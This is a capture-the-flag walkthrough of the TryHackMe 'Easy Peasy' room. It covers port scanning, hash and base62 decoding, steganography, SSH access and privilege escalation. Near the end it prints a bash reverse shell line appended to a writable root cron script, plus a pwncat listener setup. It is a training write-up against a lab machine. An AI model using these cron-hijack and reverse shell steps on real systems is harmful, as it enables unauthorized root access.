https://tryhackme.com/room/easypeasyctf
As always I start off with a Nmap version scan of all ports
nmap -sV -sC -P- -On version-scan 10.10.135.48
So we have a number of ports open:
Port 80: Open Http — Website
Port 6498: SSH
Port 65524: Open HTTP — Website
Lets first look at the website on port 80:
Nothing here, check source and also nothing of interest.
Is there a robots.txt file?
Nothing of interest here, so I will run a Dirbuster scan:
Interesting, we see two directories /hidden and /hidden/whatever, let’s take a look:
The directory /hidden takes us to a screen shot, checking the source there appears to be nothing of interest.
I downloaded the image as the Stenography was mentioned; however, I could not find and evidence of hidden content in the file.
Moving on to /hidden/whatever:
Again, a nice picture of Norway; however, looking at the source, we see a hidden paragraph indicating with what appears to be a base64 encoded string.
We have our first flag.
I also downloaded the .jpg again checking for stenography, but could not find any hidden information. Given that the source title stated ‘dead end’, I moved on to the next port.
Moving on to enumerate Port 65524:
This opens up into the standard Apache 2 welcome screen; however, checking to see whether there is a robots.txt, we see the following:
This really confused me at this stage. I have completed a number of CTF’s where I have had to change the User-Agent to access the website. Everything about this message indicated the same; however, nothing worked. I tried using Burp Suit and User Agent Switcher (Firefox Plug-in). Then I thought it was possibly encrypted as a hash.
After trying many different hash cracking site and also Hydra, I had success with hashcrc. It is an MD5 hash.
Second Flag found.
Back to the Apache 2 website, I inspected the source and found flag 3.
Further enumeration of the source code identified the following:
Again, this seemed like a hash and the comment states, “Its encoded with bas….”.
Checking the hash with Hash ID it stated it was base64, however, this did not work when trying to decrypt it. So lets try base62:
After a lot of searching a found a website that can decode base62 https://www.better-converter.com/Encoders-Decoders/Base62-Decode
The decode looked very much like a directory and this worked, taking me to a Matrix like page:
Checking the source code we see what looks like another hash:
Using the hash identifier at https://md5hashing.net/ quite a few options came up to I tried them all starting from the top. Eventually the hash type Gost worked:
There is also a jpg file here called binarycodepixabay.jpg, maybe the hash is a password for a file contained in the image.
Use Steghide to enumerate the image for Stenography.
We find a file hidden in the image called secrettext.txt, let’s open it:
This looks like a possible SSH; however the key appears to be encoded with binary. We also have a user name.
Converting from binary we get a new password:
iconvertedmypasswordtobinary
We can ssh into the system:
Looks like there is a timer; however, after 1m I am still in the system, so maybe just a panic message.
Get user.txt:
There is a clue here in that it is rotated or something, maybe this is using a ROT Cipher. Website of choice for cipher is https://www.dcode.fr/rot-cipher
We have the user Flag.
Time to Privesc this Linux box:
Fist thing Sudo -l, but user has not Sudo rights.
From here I setup a http server on my Kali box and uploaded LinEnum.sh script to the /Home/boring directory.
After chmod LinEnum.sh I ran it ./LinEnum.sh
There is an interesting cron job being run .mysecretcronjob.sh every minute. We can see that it is being run by root.
Need to find that file:
Let’s check to see whether we have write access to that file.
Excellent we can see that we have access to amend this file, let open it and see what it says.
Fantastic lets append a shell to this file
echo ‘bash -i >& /dev/tcp/IP/PORT 0>&1’ >> /var/www/.mysecretcronjob.sh
Next I am going to setup a listener on my Kali box. Instead of using Netcat, I am going to use the excellent pwncat available from:
https://github.com/calebstewart/pwncat
This is so awesome, you really need to check this out. It is like a cross between Metasploit and Netcat. It gives you a fully elevated TTY shell without needing to run a Python PTY script. It also allows automated privesc, upload and download and so much more.
Setup a pwncat listener:
A nice beginners box with lots of hash challenges along the way.